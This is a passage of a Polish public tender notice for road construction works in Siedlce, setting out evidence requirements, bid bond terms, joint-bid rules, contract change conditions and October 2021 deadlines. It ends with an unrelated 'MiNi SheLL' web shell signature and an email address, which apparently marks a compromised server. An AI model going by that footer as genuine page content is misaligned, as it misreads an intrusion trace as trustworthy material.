dowodowych, jeżeli może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125<br/>ust. 1 ustawy Pzp SWZ dane umożliwiające dostęp do tych środków. W przypadku wskazania przez<br/>Wykonawcę dostępności podmiotowych środków dowodowych pod określonymi internetowymi<br/>adresami ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy<br/>przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego<br/>podmiotowych środków dowodowych.<br/>3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli wykonawca wskaże te środki (poprzez podanie numeru referencyjnego<br/>postępowania lub nazwy postępowania) oraz potwierdzi ich prawidłowość i aktualność.<br/>4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej<br/>zamiast dokumentu, o których mowa w ust. 10.3.1. pkt. 2 SWZ, składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w<br/>przepisach miejsca wszczęcia tej procedury - wystawiony nie wcześniej niż 3 miesiące przed jego<br/>złożeniem.<br/>5. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 10.3.1. pkt. 2 SWZ, zastępuje się je odpowiednio w całości lub<br/>części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania<br/>nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub<br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania Wykonawcy. Przepis ustępu 10.4. SWZ w zakresie terminu wystawienia dokumentów stosuje się odpowiednio.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu Wykonawca składa:<br/>1) informację banku lub spółdzielczej kasy oszczędnościowo – kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich <br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania <br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>3) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów (jeżeli dotyczy). Szczegółowe wymagania dot. treści oświadczenia zostały wskazane w Rozdziale 12 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 2 000,00 zł (słownie: dwa tysiące złotych 00/100) <br/>Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia <br/>1 października 2021 r. do godz. 09.45<br/>2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>Pozostałe informacje dotyczące wadium, znajdują się w Rozdziale 17 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2.W Formularzu oferty należy wskazać nazwy wszystkich Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia.<br/>3.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z postępowania na podstawie art. 108 ust.1 ustawy Pzp,<br/>natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z ust.<br/>9.2. SWZ.<br/>4.Oświadczenie, o którym mowa w Rozdziale 10 ust. 10.1. SWZ składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza<br/>spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w<br/>którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw do wykluczenia. Oświadczenie Wykonawców wspólnie ubiegających się zamówienie<br/>winno być złożone wraz z ofertą.<br/>5.Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności do tej<br/>samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>7.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują<br/>w Formularzu oferty w pkt. 6, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>Wykonawcy.<br/>8.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na wezwanie Zamawiającego,<br/>zobowiązani są złożyć podmiotowe środki dowodowe, o których mowa w Rozdziale 10 ust. 10.3.<br/>SWZ, przy czym podmiotowe środki dowodowe,<br/>o których mowa:<br/>•w pkt. 10.3.1. SWZ składa każdy z Wykonawców wspólnie ubiegających się<br/>o udzielnie zamówienia,<br/>•w pkt. 10.3.2. SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku.<br/>9.W przypadku wykonawców występujących wspólnie warunki udziału w postępowaniu<br/>określone w Rozdziale 9 ust. 9.2. SWZ zostaną spełnione, jeżeli:<br/>• co najmniej jeden z Wykonawców występujących wspólnie będzie posiadał doświadczenie w<br/>wykonawstwie robót o charakterze minimalnego doświadczenia określonego w niniejszej SWZ,<br/>tj. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną<br/>obejmującą branżę drogową o wartości nie mniejszej niż 140 000,00 zł brutto;<br/>•co najmniej jeden z Wykonawców występujących wspólnie będzie dysponował osobą zdolną do<br/>wykonania zamówienia, tj. osobą mającą pełnić funkcję kierownika budowy, posiadającą<br/>doświadczenie na zrealizowanym przez siebie jako kierownik budowy minimum jednym zadaniu<br/>polegającym na budowie/przebudowie drogi publicznej w rozumieniu ustawy z dnia 7 lipca<br/>1994r. Prawo budowlane o wartości robót co najmniej 140 000,00 zł brutto.<br/>• dokumenty potwierdzające wysokość środków finansowych lub zdolność kredytową, w<br/>wysokości 140 000,00 zł po zsumowaniu spełnią wymagania Zamawiającego.<br/>10. Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy.<br/>11. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udz.<br/>zam., Zamawiający może na każdym etapie postępowania wezwać Wyk. do złożenia wszystkich<br/>lub niektórych podmiotowych śr. dowodowych aktualnych na dzień ich złożenia.<br/>12. Podm. śr. dowodowe lub inne dok., w tym dok. potwierdzające umocowanie do reprezentowania, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na j. polski. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie<br/>pod rygorem nieważności.<br/>2.Zamawiający dopuszcza możliwość zmiany umowy w zakresie i na określonych poniżej<br/>warunkach:<br/>1)zmiany kluczowych specjalistów przewidzianych do realizacji zamówienia przez Strony z<br/>przyczyn od nich niezależnych, w przypadku niewywiązywania się kluczowych specjalistów z<br/>obowiązków wynikających z umowy oraz nieprzewidzianych zdarzeń losowych między innymi<br/>takich jak: śmierć, choroba, ustanie stosunku pracy pod warunkiem, że osoby zaproponowane<br/>będą posiadały takie same kwalifikacje jak osoby wskazane w umowie;<br/>2) zmiany terminu realizacji przedmiotu umowy, na uzasadniony wniosek Wykonawcy i pod<br/>warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca nie mógł przewidzieć na<br/>etapie składania oferty i nie jest przez niego zawiniona, w szczególności, gdy jest<br/>spowodowana:<br/>a) opóźnieniem w przekazaniu terenu budowy przez Zamawiającego;<br/>b) opóźnieniem w przekazaniu dokumentacji budowy przez Zamawiającego, tj. SST,<br/>Specyfikacji nasadzeń zastępczych i innych dok. wymaganych odrębnymi przepisami, do<br/>których Zamawiający był zobowiązany;<br/>c) wstrzymaniem robót przez Zamawiającego - w tym przypadku termin zakończenia robót<br/>budowlanych ulegnie przedłużeniu o okres wstrzymania robót lub o okres uzgodniony pomiędzy<br/>stronami;<br/>d) warunkami atmosferycznymi, w szczególności warunkami atmosferycznymi odbiegającymi od<br/>typowych, uniemożliwiających wykonanie przedmiotu zamówienia, trwającymi dłużej niż 14 dni;<br/>e) klęską żywiołową - w tym przypadku termin zakończenia robót budowlanych zostanie<br/>przedłużony o liczbę dni trwania klęski i liczbę dni trwania naprawy szkód na budowie<br/>spowodowanych klęską żywiołową;<br/>f) zleceniem zamówień dodatkowych, o czas niezbędny na ich wykonanie.<br/>3) zmiany stawki podatku VAT, (Zamawiający przewiduje możliwość zmiany wynagrodzenia o<br/>kwotę równą różnicy w kwocie podatku VAT),<br/>4) zmiany sposobu realizacji przedmiotu zamówienia w postaci odmiennych od przyjętych w<br/>SST, dok. projektowej, skutkujących niemożliwością zrealizowania umowy przy<br/>dotychczasowych założeniach technologicznych,<br/>5) Wprowadzeniu robót zamiennych z powodu:<br/>a) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu umowy proponowanych<br/>przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego,<br/>b) aktualizacji rozwiązań projektowych w uwagi na postęp technologiczny,<br/>c) zaprzestania produkcji materiałów budowlanych, których użycie Zamawiający przewidział przy<br/>realizacji przedmiotu umowy,<br/>d) wad dokumentacji projektowej,<br/>e) zmiany przepisów prawa budowlanego w trakcie realizacji przedmiotu umowy.<br/>Szczegółowy zakres robót zamiennych musi zostać udokumentowany. Wprowadzenie robót<br/>zamiennych w żaden sposób nie może wpłynąć na kwotę wynagrodzenia należnego<br/>Wykonawcy, określoną w § 4 ust. 1 umowy.<br/>3. Jeżeli zmiana umowy wymaga zmiany dokumentacji projektowej lub SST, strona inicjująca<br/>zmianę przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z informacją<br/>o konieczności lub nie zmiany Pozwolenia na budowę (jeżeli dotyczy) oraz przedmiar robót i<br/>niezbędne rysunki. Projekt ten wymaga zatwierdzenia do realizacji przez Zamawiającego.<br/>4. Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich<br/>wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania. Takimi zmianami są: zmiany o charakterze administracyjno - organizacyjnym umowy, np.: zmiana nr konta bankowego,<br/>dotycząca nazwy, siedziby Wykonawcy lub jego formy organizacyjno - prawnej w trakcie trwania<br/>umowy, innych danych identyfikacyjnych, zmiany prowadzące do likwidacji oczywistych omyłek<br/>pisarskich i rachunkowych w treści umowy.<br/>Pozostałe informacje dotyczące zmiany umowy znajdują się w § 14 projektu umowy (załącznik nr 4 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-01 09:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miasto-siedlce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-01 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com